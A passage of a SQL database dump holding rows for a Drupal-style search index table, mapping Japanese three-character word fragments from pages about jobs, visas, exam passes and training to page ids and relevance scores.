('なる面', 197, 'ja', 'node_search', 1),
('なアド', 120, 'ja', 'node_search', 1),
('なイン', 135, 'ja', 'node_search', 1),
('なイン', 136, 'ja', 'node_search', 1),
('なエン', 10, 'ja', 'node_search', 3),
('なキャ', 162, 'ja', 'node_search', 1.68961),
('なキャ', 164, 'ja', 'node_search', 1),
('なキャ', 167, 'ja', 'node_search', 1),
('なキャ', 169, 'ja', 'node_search', 1),
('なキャ', 171, 'ja', 'node_search', 1),
('なキャ', 173, 'ja', 'node_search', 27.9769),
('なキャ', 174, 'ja', 'node_search', 1),
('なキャ', 175, 'ja', 'node_search', 1),
('なキャ', 176, 'ja', 'node_search', 1),
('なキャ', 177, 'ja', 'node_search', 1),
('なキャ', 180, 'ja', 'node_search', 0.98493),
('なキャ', 184, 'ja', 'node_search', 0.923838),
('なキャ', 186, 'ja', 'node_search', 1),
('なキャ', 189, 'ja', 'node_search', 0.805455),
('なキャ', 196, 'ja', 'node_search', 0.938382),
('なスキ', 135, 'ja', 'node_search', 0.873132),
('なスタ', 164, 'ja', 'node_search', 4),
('なスタ', 174, 'ja', 'node_search', 27),
('なステ', 182, 'ja', 'node_search', 0.938382),
('なスピ', 138, 'ja', 'node_search', 0.949597),
('なチャ', 187, 'ja', 'node_search', 0.997306),
('なチャ', 194, 'ja', 'node_search', 1),
('なトレ', 136, 'ja', 'node_search', 1),
('なビザ', 7, 'ja', 'node_search', 3.8861),
('なフラ', 156, 'ja', 'node_search', 1),
('なフラ', 157, 'ja', 'node_search', 1),
('なプロ', 116, 'ja', 'node_search', 1),
('な一歩', 160, 'ja', 'node_search', 1),
('な一歩', 175, 'ja', 'node_search', 1),
('な一歩', 177, 'ja', 'node_search', 27),
('な一歩', 178, 'ja', 'node_search', 1),
('な一歩', 181, 'ja', 'node_search', 0.913226),
('な一歩', 185, 'ja', 'node_search', 1),
('な一歩', 190, 'ja', 'node_search', 0.953396),
('な一歩', 193, 'ja', 'node_search', 1),
('な一歩', 196, 'ja', 'node_search', 0.957226),
('な仕事', 87, 'ja', 'node_search', 1),
('な会話', 28, 'ja', 'node_search', 1),
('な伝統', 122, 'ja', 'node_search', 0.942091),
('な体験', 135, 'ja', 'node_search', 0.697623),
('な価格', 27, 'ja', 'node_search', 0.993729),
('な先生', 24, 'ja', 'node_search', 1),
('な内容', 6, 'ja', 'node_search', 3),
('な前進', 168, 'ja', 'node_search', 1),
('な前進', 170, 'ja', 'node_search', 1),
('な前進', 180, 'ja', 'node_search', 1),
('な前進', 196, 'ja', 'node_search', 1),
('な前進', 198, 'ja', 'node_search', 1),
('な前進', 199, 'ja', 'node_search', 1),
('な努力', 183, 'ja', 'node_search', 1),
('な可能', 183, 'ja', 'node_search', 27.9274),
('な可能', 191, 'ja', 'node_search', 0.938382),
('な可能', 197, 'ja', 'node_search', 1),
('な問題', 3, 'ja', 'node_search', 1),
('な問題', 136, 'ja', 'node_search', 0.703756),
('な喜び', 135, 'ja', 'node_search', 0.781775),
('な場合', 5, 'ja', 'node_search', 1),
('な場合', 24, 'ja', 'node_search', 0.547222),
('な女性', 18, 'ja', 'node_search', 1),
('な姿勢', 80, 'ja', 'node_search', 1),
('な姿勢', 140, 'ja', 'node_search', 0.968904),
('な姿勢', 194, 'ja', 'node_search', 0.980874),
('な姿勢', 197, 'ja', 'node_search', 0.972861),
('な娘と', 80, 'ja', 'node_search', 1),
('な学習', 62, 'ja', 'node_search', 0.886095),
('な学習', 166, 'ja', 'node_search', 1),
('な学習', 180, 'ja', 'node_search', 1),
('な学習', 181, 'ja', 'node_search', 1),
('な学習', 192, 'ja', 'node_search', 1),
('な学習', 199, 'ja', 'node_search', 1),
('な建設', 27, 'ja', 'node_search', 0.452478),
('な成果', 181, 'ja', 'node_search', 0.976851),
('な成果', 188, 'ja', 'node_search', 1),
('な成果', 190, 'ja', 'node_search', 1),
('な成果', 197, 'ja', 'node_search', 1),
('な成績', 81, 'ja', 'node_search', 1),
('な成長', 174, 'ja', 'node_search', 0.976851),
('な技術', 7, 'ja', 'node_search', 3.69826),
('な指導', 23, 'ja', 'node_search', 0.571798),
('な指導', 142, 'ja', 'node_search', 0.729424),
('な挑戦', 165, 'ja', 'node_search', 0.920273),
('な挑戦', 169, 'ja', 'node_search', 4),
('な挑戦', 175, 'ja', 'node_search', 27),
('な挑戦', 178, 'ja', 'node_search', 0.906287),
('な挑戦', 185, 'ja', 'node_search', 0.797402),
('な挑戦', 188, 'ja', 'node_search', 0.78951),
('な振る', 87, 'ja', 'node_search', 0.886095),
('な支援', 62, 'ja', 'node_search', 0.697623),
('な支援', 179, 'ja', 'node_search', 0.830633),
('な方に', 155, 'ja', 'node_search', 0.774192),
('な旅を', 73, 'ja', 'node_search', 1),
('な日本', 135, 'ja', 'node_search', 1),
('な旬の', 122, 'ja', 'node_search', 1),
('な業界', 185, 'ja', 'node_search', 0.889397),
('な機械', 23, 'ja', 'node_search', 0.879565),
('な活躍', 126, 'ja', 'node_search', 1),
('な準備', 160, 'ja', 'node_search', 1),
('な準備', 161, 'ja', 'node_search', 1),
('な準備', 168, 'ja', 'node_search', 1),
('な準備', 170, 'ja', 'node_search', 1),
('な準備', 194, 'ja', 'node_search', 0.957226),
('な準備', 197, 'ja', 'node_search', 0.949597),
('な溶接', 8, 'ja', 'node_search', 2),
('な漢字', 62, 'ja', 'node_search', 0.810915),
('な睡眠', 87, 'ja', 'node_search', 0.786915),
('な第一', 161, 'ja', 'node_search', 1),
('な第一', 180, 'ja', 'node_search', 0.949597),
('な第一', 186, 'ja', 'node_search', 0.989021),
('な第一', 187, 'ja', 'node_search', 1),
('な第一', 192, 'ja', 'node_search', 0.949597),
('な節目', 164, 'ja', 'node_search', 1),
('な節目', 171, 'ja', 'node_search', 1),
('な節目', 177, 'ja', 'node_search', 1),
('な節目', 191, 'ja', 'node_search', 0.961087),
('な素晴', 156, 'ja', 'node_search', 1),
('な素晴', 157, 'ja', 'node_search', 0.949597),
('な経験', 98, 'ja', 'node_search', 1),
('な経験', 116, 'ja', 'node_search', 1),
('な経験', 136, 'ja', 'node_search', 0.851346),
('な考え', 87, 'ja', 'node_search', 0.681785),
('な職場', 120, 'ja', 'node_search', 0.913226),
('な職場', 136, 'ja', 'node_search', 0.76431),
('な職業', 194, 'ja', 'node_search', 1),
('な良い', 87, 'ja', 'node_search', 0.588512),
('な語彙', 133, 'ja', 'node_search', 1),
('な課題', 138, 'ja', 'node_search', 0.681785),
('な講師', 133, 'ja', 'node_search', 0.851346),
('な講師', 138, 'ja', 'node_search', 1),
('な資格', 183, 'ja', 'node_search', 0.899454),
('な資質', 189, 'ja', 'node_search', 0.934703),
('な進歩', 140, 'ja', 'node_search', 0.802752),
('な郡区', 27, 'ja', 'node_search', 0.36229),
('な関係', 25, 'ja', 'node_search', 1),
('な限り', 27, 'ja', 'node_search', 0.522445),
('な面だ', 122, 'ja', 'node_search', 1),
('にあな', 69, 'ja', 'node_search', 0.968904),
('にある', 122, 'ja', 'node_search', 0.961087),
('にある', 134, 'ja', 'node_search', 1),
('にある', 144, 'ja', 'node_search', 1),
('にいま', 1, 'ja', 'node_search', 0.934703),
('におい', 87, 'ja', 'node_search', 1),
('におい', 162, 'ja', 'node_search', 0.876337),
('におけ', 27, 'ja', 'node_search', 0.448322),
('におけ', 122, 'ja', 'node_search', 1),
('におけ', 165, 'ja', 'node_search', 1),
('におけ', 179, 'ja', 'node_search', 1),
('におす', 155, 'ja', 'node_search', 0.769219),
('におめ', 187, 'ja', 'node_search', 0.759465),
('におめ', 190, 'ja', 'node_search', 0.792123),
('におめ', 194, 'ja', 'node_search', 0.774192),
('におめ', 197, 'ja', 'node_search', 0.792123),
('にお伝', 3, 'ja', 'node_search', 1),
('にお問', 1, 'ja', 'node_search', 1),
('にお問', 155, 'ja', 'node_search', 0.648686),
('にお問', 163, 'ja', 'node_search', 0.628375),
('にきれ', 87, 'ja', 'node_search', 0.957226),
('にここ', 1, 'ja', 'node_search', 0.945829),
('にこれ', 136, 'ja', 'node_search', 0.674137),
('にご満', 27, 'ja', 'node_search', 0.307114),
('にされ', 194, 'ja', 'node_search', 1),
('にして', 87, 'ja', 'node_search', 1),
('にして', 135, 'ja', 'node_search', 1),
('にする', 135, 'ja', 'node_search', 0.808176),
('につい', 1, 'ja', 'node_search', 1),
('につい', 3, 'ja', 'node_search', 2.88264),
('につい', 29, 'ja', 'node_search', 3),
('につい', 30, 'ja', 'node_search', 1.84234),
('につい', 122, 'ja', 'node_search', 1),
('につい', 155, 'ja', 'node_search', 1.66266),
('につい', 162, 'ja', 'node_search', 0.636679),
('につけ', 193, 'ja', 'node_search', 0.945829),
('につな', 164, 'ja', 'node_search', 0.845322),
('につな', 178, 'ja', 'node_search', 0.976851),
('につな', 189, 'ja', 'node_search', 0.879565),
('につな', 192, 'ja', 'node_search', 0.892724),
('につな', 193, 'ja', 'node_search', 0.920273),
('につな', 194, 'ja', 'node_search', 0.909743),
('につな', 197, 'ja', 'node_search', 0.902857),
('にとっ', 3, 'ja', 'node_search', 0.752312),
('にとっ', 135, 'ja', 'node_search', 0.797402),
('にとっ', 164, 'ja', 'node_search', 1),
('にとっ', 171, 'ja', 'node_search', 1),
('にとっ', 174, 'ja', 'node_search', 1),
('にとっ', 177, 'ja', 'node_search', 1),
('にとど', 197, 'ja', 'node_search', 1),
('になり', 23, 'ja', 'node_search', 0.76431),
('になり', 68, 'ja', 'node_search', 1),
('になり', 144, 'ja', 'node_search', 1),
('になる', 26, 'ja', 'node_search', 1),
('にはワ', 24, 'ja', 'node_search', 0.699655),
('には下', 24, 'ja', 'node_search', 0.63167),
('には言', 24, 'ja', 'node_search', 0.800068),
('には誰', 3, 'ja', 'node_search', 43),
('にも包', 136, 'ja', 'node_search', 1),
('にも卓', 116, 'ja', 'node_search', 1),
('にも英', 24, 'ja', 'node_search', 0.557303),
('にやっ', 19, 'ja', 'node_search', 1),
('によっ', 9, 'ja', 'node_search', 3),
('によっ', 17, 'ja', 'node_search', 4),
('によっ', 190, 'ja', 'node_search', 1),
('によっ', 199, 'ja', 'node_search', 0.953396),
('により', 27, 'ja', 'node_search', 0.561181),
('により', 136, 'ja', 'node_search', 1.71476),
('により', 138, 'ja', 'node_search', 1),
('により', 183, 'ja', 'node_search', 27);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('により', 190, 'ja', 'node_search', 1),
('により', 194, 'ja', 'node_search', 1),
('による', 142, 'ja', 'node_search', 0.742984),
('による', 179, 'ja', 'node_search', 0.980874),
('にわた', 150, 'ja', 'node_search', 1),
('にわた', 165, 'ja', 'node_search', 1),
('にサポ', 80, 'ja', 'node_search', 1),
('にサポ', 135, 'ja', 'node_search', 0.722831),
('にトク', 126, 'ja', 'node_search', 1),
('にヤン', 95, 'ja', 'node_search', 19),
('に一生', 87, 'ja', 'node_search', 0.615536),
('に仕事', 3, 'ja', 'node_search', 0.584241),
('に仕事', 69, 'ja', 'node_search', 1),
('に仕事', 87, 'ja', 'node_search', 16.9421),
('に付け', 138, 'ja', 'node_search', 0.909743),
('に付け', 140, 'ja', 'node_search', 0.892724),
('に付け', 142, 'ja', 'node_search', 0.703756),
('に会社', 27, 'ja', 'node_search', 1),
('に伝え', 133, 'ja', 'node_search', 0.882818),
('に備え', 87, 'ja', 'node_search', 0.771698),
('に働き', 163, 'ja', 'node_search', 1),
('に優秀', 81, 'ja', 'node_search', 4),
('に入れ', 3, 'ja', 'node_search', 1),
('に出ま', 80, 'ja', 'node_search', 1),
('に出発', 140, 'ja', 'node_search', 1),
('に分け', 7, 'ja', 'node_search', 1.8861),
('に到着', 3, 'ja', 'node_search', 1),
('に到着', 126, 'ja', 'node_search', 1),
('に到着', 142, 'ja', 'node_search', 0.76431),
('に加え', 27, 'ja', 'node_search', 0.687638),
('に努め', 87, 'ja', 'node_search', 1),
('に努め', 161, 'ja', 'node_search', 0.822065),
('に効果', 28, 'ja', 'node_search', 1),
('に勤め', 24, 'ja', 'node_search', 1),
('に十分', 27, 'ja', 'node_search', 0.308253),
('に十分', 98, 'ja', 'node_search', 1),
('に参加', 62, 'ja', 'node_search', 0.504001),
('に参加', 95, 'ja', 'node_search', 1),
('に取り', 69, 'ja', 'node_search', 1),
('に取り', 77, 'ja', 'node_search', 1),
('に取り', 150, 'ja', 'node_search', 1),
('に合っ', 23, 'ja', 'node_search', 0.494765),
('に合っ', 24, 'ja', 'node_search', 0.473576),
('に合っ', 26, 'ja', 'node_search', 1),
('に合格', 23, 'ja', 'node_search', 0.459294),
('に合格', 70, 'ja', 'node_search', 1),
('に合格', 71, 'ja', 'node_search', 1),
('に合格', 72, 'ja', 'node_search', 1),
('に合格', 74, 'ja', 'node_search', 1),
('に合格', 75, 'ja', 'node_search', 1),
('に合格', 82, 'ja', 'node_search', 1),
('に合格', 84, 'ja', 'node_search', 1),
('に合格', 90, 'ja', 'node_search', 1),
('に合格', 98, 'ja', 'node_search', 1),
('に合格', 100, 'ja', 'node_search', 4),
('に合格', 107, 'ja', 'node_search', 1),
('に合格', 109, 'ja', 'node_search', 1),
('に合格', 112, 'ja', 'node_search', 1),
('に合格', 114, 'ja', 'node_search', 1),
('に合格', 115, 'ja', 'node_search', 1),
('に合格', 117, 'ja', 'node_search', 1),
('に合格', 121, 'ja', 'node_search', 1),
('に合格', 123, 'ja', 'node_search', 1),
('に合格', 125, 'ja', 'node_search', 1),
('に合格', 131, 'ja', 'node_search', 1),
('に合格', 132, 'ja', 'node_search', 1),
('に合格', 133, 'ja', 'node_search', 0.779231),
('に合格', 134, 'ja', 'node_search', 1),
('に合格', 135, 'ja', 'node_search', 1),
('に合格', 136, 'ja', 'node_search', 2),
('に合格', 137, 'ja', 'node_search', 1),
('に合格', 138, 'ja', 'node_search', 0.993146),
('に合格', 139, 'ja', 'node_search', 1),
('に合格', 140, 'ja', 'node_search', 1),
('に合格', 141, 'ja', 'node_search', 1),
('に合格', 143, 'ja', 'node_search', 1),
('に合格', 144, 'ja', 'node_search', 1),
('に合格', 160, 'ja', 'node_search', 3.99047),
('に合格', 161, 'ja', 'node_search', 1.74996),
('に合格', 166, 'ja', 'node_search', 4.08679),
('に合格', 168, 'ja', 'node_search', 1.75946),
('に合格', 170, 'ja', 'node_search', 3.98118),
('に合格', 178, 'ja', 'node_search', 1.78178),
('に合格', 179, 'ja', 'node_search', 1.73165),
('に合格', 180, 'ja', 'node_search', 1.80007),
('に合格', 181, 'ja', 'node_search', 1.78178),
('に合格', 182, 'ja', 'node_search', 1.79212),
('に合格', 183, 'ja', 'node_search', 1.73165),
('に合格', 185, 'ja', 'node_search', 4.00925),
('に合格', 186, 'ja', 'node_search', 1.76922),
('に合格', 187, 'ja', 'node_search', 3.96276),
('に合格', 188, 'ja', 'node_search', 1.76188),
('に合格', 189, 'ja', 'node_search', 3.99983),
('に合格', 190, 'ja', 'node_search', 4.07688),
('に合格', 191, 'ja', 'node_search', 4.2327),
('に合格', 192, 'ja', 'node_search', 4.11692),
('に合格', 193, 'ja', 'node_search', 4.17901),
('に合格', 194, 'ja', 'node_search', 4.00925),
('に合格', 195, 'ja', 'node_search', 1.80545),
('に合格', 196, 'ja', 'node_search', 4.18961),
('に合格', 197, 'ja', 'node_search', 4.07688),
('に合格', 198, 'ja', 'node_search', 1.78178),
('に合格', 199, 'ja', 'node_search', 4.01872),
('に同行', 77, 'ja', 'node_search', 1),
('に向か', 173, 'ja', 'node_search', 0.886095),
('に向か', 183, 'ja', 'node_search', 0.848323),
('に向け', 62, 'ja', 'node_search', 0.482973),
('に向け', 142, 'ja', 'node_search', 1),
('に向け', 160, 'ja', 'node_search', 1),
('に向け', 166, 'ja', 'node_search', 1),
('に向け', 168, 'ja', 'node_search', 1),
('に向け', 170, 'ja', 'node_search', 1),
('に向け', 179, 'ja', 'node_search', 1),
('に向け', 180, 'ja', 'node_search', 1),
('に向け', 182, 'ja', 'node_search', 0.961087),
('に向け', 185, 'ja', 'node_search', 1),
('に向け', 186, 'ja', 'node_search', 1.88282),
('に向け', 188, 'ja', 'node_search', 1),
('に向け', 190, 'ja', 'node_search', 0.976851),
('に向け', 191, 'ja', 'node_search', 0.98493),
('に向け', 192, 'ja', 'node_search', 1),
('に向け', 193, 'ja', 'node_search', 1),
('に向け', 195, 'ja', 'node_search', 1),
('に向け', 196, 'ja', 'node_search', 1),
('に向け', 198, 'ja', 'node_search', 1),
('に向け', 199, 'ja', 'node_search', 1),
('に在住', 3, 'ja', 'node_search', 1),
('に基づ', 140, 'ja', 'node_search', 1),
('に外国', 27, 'ja', 'node_search', 0.348491),
('に実習', 24, 'ja', 'node_search', 0.839384),
('に実践', 135, 'ja', 'node_search', 0.886095),
('に寝る', 87, 'ja', 'node_search', 0.808176),
('に対し', 6, 'ja', 'node_search', 3),
('に対し', 7, 'ja', 'node_search', 1.8861),
('に対し', 23, 'ja', 'node_search', 1.04471),
('に対す', 3, 'ja', 'node_search', 0.543537),
('に対す', 7, 'ja', 'node_search', 32.6432),
('に対す', 122, 'ja', 'node_search', 0.934703),
('に就い', 68, 'ja', 'node_search', 1),
('に就く', 98, 'ja', 'node_search', 1),
('に尽力', 23, 'ja', 'node_search', 0.415562),
('に尽力', 136, 'ja', 'node_search', 0.652202),
('に居住', 150, 'ja', 'node_search', 1),
('に当社', 23, 'ja', 'node_search', 1),
('に従事', 7, 'ja', 'node_search', 1.8861),
('に従事', 27, 'ja', 'node_search', 0.376684),
('に徹底', 87, 'ja', 'node_search', 0.714225),
('に必要', 5, 'ja', 'node_search', 3),
('に必要', 6, 'ja', 'node_search', 3),
('に応じ', 24, 'ja', 'node_search', 0.543537),
('に応募', 135, 'ja', 'node_search', 0.745294),
('に思い', 69, 'ja', 'node_search', 1),
('に思う', 87, 'ja', 'node_search', 0.595774),
('に恵ま', 174, 'ja', 'node_search', 0.810915),
('に感謝', 69, 'ja', 'node_search', 1),
('に成功', 23, 'ja', 'node_search', 0.657549),
('に成長', 195, 'ja', 'node_search', 1),
('に戻る', 3, 'ja', 'node_search', 0.567769),
('に手頃', 27, 'ja', 'node_search', 0.641769),
('に扱い', 77, 'ja', 'node_search', 4),
('に扱い', 87, 'ja', 'node_search', 0.635),
('に投資', 3, 'ja', 'node_search', 1),
('に指導', 133, 'ja', 'node_search', 1),
('に提供', 24, 'ja', 'node_search', 0.36497),
('に損失', 26, 'ja', 'node_search', 1),
('に支援', 23, 'ja', 'node_search', 0.471741),
('に新し', 3, 'ja', 'node_search', 0.60778),
('に日本', 78, 'ja', 'node_search', 1),
('に日本', 87, 'ja', 'node_search', 0.860547),
('に日本', 111, 'ja', 'node_search', 1),
('に日本', 126, 'ja', 'node_search', 1),
('に時間', 24, 'ja', 'node_search', 0.516879),
('に最善', 87, 'ja', 'node_search', 0.705825),
('に期待', 126, 'ja', 'node_search', 1),
('に期待', 180, 'ja', 'node_search', 0.906287),
('に期待', 186, 'ja', 'node_search', 0.938382),
('に期待', 188, 'ja', 'node_search', 0.863659),
('に来て', 6, 'ja', 'node_search', 3),
('に来ら', 19, 'ja', 'node_search', 2),
('に残業', 5, 'ja', 'node_search', 1),
('に気を', 77, 'ja', 'node_search', 4),
('に求め', 30, 'ja', 'node_search', 3),
('に沿っ', 27, 'ja', 'node_search', 0.578643),
('に注力', 135, 'ja', 'node_search', 1),
('に活用', 116, 'ja', 'node_search', 1),
('に減ら', 87, 'ja', 'node_search', 0.745294),
('に渡っ', 3, 'ja', 'node_search', 0.759465),
('に熱心', 150, 'ja', 'node_search', 1),
('に特定', 164, 'ja', 'node_search', 1.75231),
('に特定', 169, 'ja', 'node_search', 1),
('に特定', 171, 'ja', 'node_search', 3.10681),
('に特定', 174, 'ja', 'node_search', 0.72066),
('に特定', 175, 'ja', 'node_search', 0.766757),
('に特定', 177, 'ja', 'node_search', 0.712106),
('に特定', 184, 'ja', 'node_search', 0.759465),
('に献身', 80, 'ja', 'node_search', 1),
('に発揮', 189, 'ja', 'node_search', 0.913226),
('に登録', 28, 'ja', 'node_search', 3),
('に目指', 26, 'ja', 'node_search', 1),
('に知識', 133, 'ja', 'node_search', 0.902857),
('に立つ', 24, 'ja', 'node_search', 0.407953),
('に置き', 87, 'ja', 'node_search', 0.676032),
('に自信', 136, 'ja', 'node_search', 0.718502),
('に自信', 163, 'ja', 'node_search', 0.695602),
('に自動', 27, 'ja', 'node_search', 0.920273),
('に興味', 24, 'ja', 'node_search', 0.645209),
('に興味', 155, 'ja', 'node_search', 0.725015),
('に行き', 24, 'ja', 'node_search', 0.38797),
('に行く', 19, 'ja', 'node_search', 3),
('に覚え', 87, 'ja', 'node_search', 16),
('に設立', 23, 'ja', 'node_search', 1),
('に設立', 27, 'ja', 'node_search', 2.22521),
('に設計', 140, 'ja', 'node_search', 0.873132),
('に評価', 142, 'ja', 'node_search', 1),
('に話さ', 18, 'ja', 'node_search', 0.931053),
('に話す', 30, 'ja', 'node_search', 1.84234),
('に詳し', 1, 'ja', 'node_search', 1),
('に負け', 25, 'ja', 'node_search', 1),
('に負け', 26, 'ja', 'node_search', 1),
('に送り', 69, 'ja', 'node_search', 0.942091),
('に進み', 154, 'ja', 'node_search', 0.957226),
('に進み', 178, 'ja', 'node_search', 0.927431),
('に進み', 187, 'ja', 'node_search', 0.845322),
('に進み', 190, 'ja', 'node_search', 0.886095),
('に進み', 194, 'ja', 'node_search', 0.863659),
('に遭遇', 136, 'ja', 'node_search', 0.913226),
('に選ば', 25, 'ja', 'node_search', 1),
('に重要', 140, 'ja', 'node_search', 0.833529),
('に関す', 24, 'ja', 'node_search', 0.674137),
('に関す', 150, 'ja', 'node_search', 19),
('に関連', 3, 'ja', 'node_search', 0.813674),
('に関連', 24, 'ja', 'node_search', 0.374963),
('に面接', 142, 'ja', 'node_search', 0.824901),
('に韓国', 23, 'ja', 'node_search', 0.613969),
('に食品', 68, 'ja', 'node_search', 4),
('ねが実', 191, 'ja', 'node_search', 1),
('ねた研', 24, 'ja', 'node_search', 1),
('ねた結', 182, 'ja', 'node_search', 1),
('ねた結', 183, 'ja', 'node_search', 1),
('ねてき', 165, 'ja', 'node_search', 0.972861),
('ねてき', 184, 'ja', 'node_search', 0.976851),
('ねによ', 179, 'ja', 'node_search', 0.98493),
('ねによ', 190, 'ja', 'node_search', 1),
('ねによ', 199, 'ja', 'node_search', 0.957226),
('ねられ', 169, 'ja', 'node_search', 0.902857),
('のある', 18, 'ja', 'node_search', 0.993146),
('のある', 27, 'ja', 'node_search', 0.311724),
('のある', 138, 'ja', 'node_search', 0.693594),
('のある', 155, 'ja', 'node_search', 0.718502),
('のある', 163, 'ja', 'node_search', 1.32798),
('のある', 188, 'ja', 'node_search', 0.934703),
('のお仕', 162, 'ja', 'node_search', 1),
('のお知', 24, 'ja', 'node_search', 0.445866),
('のお知', 154, 'ja', 'node_search', 27),
('のお知', 155, 'ja', 'node_search', 2),
('のお知', 161, 'ja', 'node_search', 31),
('のお知', 163, 'ja', 'node_search', 4),
('のお知', 164, 'ja', 'node_search', 27),
('のお知', 165, 'ja', 'node_search', 27),
('のお知', 166, 'ja', 'node_search', 31),
('のお知', 167, 'ja', 'node_search', 27),
('のお知', 168, 'ja', 'node_search', 31),
('のお知', 169, 'ja', 'node_search', 27),
('のお知', 170, 'ja', 'node_search', 31),
('のお知', 171, 'ja', 'node_search', 27),
('のお知', 176, 'ja', 'node_search', 27),
('のお知', 178, 'ja', 'node_search', 31),
('のお知', 179, 'ja', 'node_search', 31),
('のお知', 180, 'ja', 'node_search', 31),
('のお知', 181, 'ja', 'node_search', 27),
('のお知', 182, 'ja', 'node_search', 4),
('のお知', 183, 'ja', 'node_search', 4),
('のお知', 184, 'ja', 'node_search', 27),
('のお知', 185, 'ja', 'node_search', 31),
('のお知', 186, 'ja', 'node_search', 31),
('のお知', 187, 'ja', 'node_search', 31),
('のお知', 188, 'ja', 'node_search', 31),
('のお知', 189, 'ja', 'node_search', 31),
('のお知', 190, 'ja', 'node_search', 31),
('のお知', 191, 'ja', 'node_search', 31),
('のお知', 192, 'ja', 'node_search', 31),
('のお知', 193, 'ja', 'node_search', 31),
('のお知', 194, 'ja', 'node_search', 31),
('のお知', 195, 'ja', 'node_search', 31),
('のお知', 196, 'ja', 'node_search', 31),
('のお知', 197, 'ja', 'node_search', 31),
('のお知', 198, 'ja', 'node_search', 31),
('のお知', 199, 'ja', 'node_search', 31),
('のお知', 200, 'ja', 'node_search', 31),
('のこだ', 27, 'ja', 'node_search', 0.441034),
('のご出', 113, 'ja', 'node_search', 1),
('のご報', 160, 'ja', 'node_search', 27),
('のご報', 182, 'ja', 'node_search', 27),
('のご活', 156, 'ja', 'node_search', 1),
('のご活', 157, 'ja', 'node_search', 1),
('のご活', 160, 'ja', 'node_search', 0.863659),
('のご活', 161, 'ja', 'node_search', 0.913226),
('のご活', 166, 'ja', 'node_search', 0.892724),
('のご活', 168, 'ja', 'node_search', 0.896076),
('のご活', 169, 'ja', 'node_search', 0.851346),
('のご活', 170, 'ja', 'node_search', 0.906287),
('のご活', 171, 'ja', 'node_search', 0.830633),
('のご活', 176, 'ja', 'node_search', 0.863659),
('のご活', 179, 'ja', 'node_search', 0.754681),
('のご活', 180, 'ja', 'node_search', 0.842342),
('のご活', 191, 'ja', 'node_search', 0.830633),
('のご活', 192, 'ja', 'node_search', 0.816452),
('のご活', 193, 'ja', 'node_search', 0.816452),
('のご活', 195, 'ja', 'node_search', 0.839384),
('のご活', 196, 'ja', 'node_search', 0.839384),
('のご活', 198, 'ja', 'node_search', 0.802752),
('のご自', 162, 'ja', 'node_search', 0.961087),
('のさま', 183, 'ja', 'node_search', 0.945829),
('のさら', 113, 'ja', 'node_search', 1),
('のさら', 161, 'ja', 'node_search', 0.781775),
('のさら', 178, 'ja', 'node_search', 0.824901),
('のさら', 181, 'ja', 'node_search', 0.845322),
('のさら', 199, 'ja', 'node_search', 0.909743),
('のたび', 161, 'ja', 'node_search', 1),
('のため', 3, 'ja', 'node_search', 1.2529),
('のため', 5, 'ja', 'node_search', 3),
('のため', 7, 'ja', 'node_search', 3.8861),
('のため', 24, 'ja', 'node_search', 0.954113),
('のため', 27, 'ja', 'node_search', 0.76431),
('のため', 73, 'ja', 'node_search', 1),
('のため', 87, 'ja', 'node_search', 0.620288),
('のため', 136, 'ja', 'node_search', 0.679856),
('のつな', 24, 'ja', 'node_search', 0.369897),
('のであ', 3, 'ja', 'node_search', 0.685676),
('のであ', 199, 'ja', 'node_search', 0.920273),
('のです', 179, 'ja', 'node_search', 0.96498),
('のとな', 164, 'ja', 'node_search', 0.873132),
('のとな', 165, 'ja', 'node_search', 0.833529),
('のとな', 166, 'ja', 'node_search', 0.822065),
('のとな', 171, 'ja', 'node_search', 0.873132),
('のとな', 174, 'ja', 'node_search', 0.851346),
('のとな', 178, 'ja', 'node_search', 0.876337),
('のとな', 185, 'ja', 'node_search', 0.774192),
('のとな', 187, 'ja', 'node_search', 0.800068),
('のとな', 189, 'ja', 'node_search', 0.776703),
('のとな', 199, 'ja', 'node_search', 0.781775),
('のもと', 28, 'ja', 'node_search', 28),
('のもの', 3, 'ja', 'node_search', 0.689612),
('のよう', 77, 'ja', 'node_search', 4),
('のよう', 87, 'ja', 'node_search', 0.638366),
('のよう', 155, 'ja', 'node_search', 0.781775),
('のよう', 189, 'ja', 'node_search', 0.945829),
('のアク', 138, 'ja', 'node_search', 0.794753),
('のアプ', 136, 'ja', 'node_search', 1),
('のアプ', 138, 'ja', 'node_search', 1),
('のイメ', 116, 'ja', 'node_search', 1),
('のイン', 122, 'ja', 'node_search', 1),
('のウェ', 1, 'ja', 'node_search', 7),
('のカス', 62, 'ja', 'node_search', 4),
('のカテ', 7, 'ja', 'node_search', 1.8861),
('のキャ', 160, 'ja', 'node_search', 4),
('のキャ', 161, 'ja', 'node_search', 1),
('のキャ', 178, 'ja', 'node_search', 1),
('のキャ', 185, 'ja', 'node_search', 1),
('のキャ', 193, 'ja', 'node_search', 1),
('のキャ', 198, 'ja', 'node_search', 1),
('のサポ', 62, 'ja', 'node_search', 0.747619),
('のサポ', 162, 'ja', 'node_search', 1.6738),
('のサー', 24, 'ja', 'node_search', 0.486839),
('のシナ', 135, 'ja', 'node_search', 0.945829),
('のシン', 9, 'ja', 'node_search', 28),
('のシン', 17, 'ja', 'node_search', 29),
('のスキ', 140, 'ja', 'node_search', 0.913226),
('のスタ', 154, 'ja', 'node_search', 1),
('のスタ', 196, 'ja', 'node_search', 0.916736),
('のステ', 185, 'ja', 'node_search', 1),
('のスピ', 138, 'ja', 'node_search', 19),
('のゼー', 23, 'ja', 'node_search', 1),
('のチャ', 24, 'ja', 'node_search', 0.501918),
('のチャ', 62, 'ja', 'node_search', 4),
('のトラ', 23, 'ja', 'node_search', 0.938382),
('のトレ', 133, 'ja', 'node_search', 0.76188),
('のネイ', 133, 'ja', 'node_search', 1),
('のビザ', 7, 'ja', 'node_search', 1.83192),
('のファ', 62, 'ja', 'node_search', 0.510357),
('のプロ', 27, 'ja', 'node_search', 1.62367),
('のホテ', 155, 'ja', 'node_search', 1),
('のポジ', 5, 'ja', 'node_search', 3),
('のポジ', 10, 'ja', 'node_search', 3),
('のメッ', 155, 'ja', 'node_search', 0.672252),
('のリー', 120, 'ja', 'node_search', 1),
('のレス', 133, 'ja', 'node_search', 1),
('のレッ', 122, 'ja', 'node_search', 1),
('のロー', 135, 'ja', 'node_search', 0.980874),
('の一つ', 27, 'ja', 'node_search', 0.490769),
('の一つ', 162, 'ja', 'node_search', 0.819249),
('の一部', 23, 'ja', 'node_search', 1.75707),
('の一部', 24, 'ja', 'node_search', 0.752312),
('の一部', 27, 'ja', 'node_search', 0.827757),
('の下で', 23, 'ja', 'node_search', 0.563797),
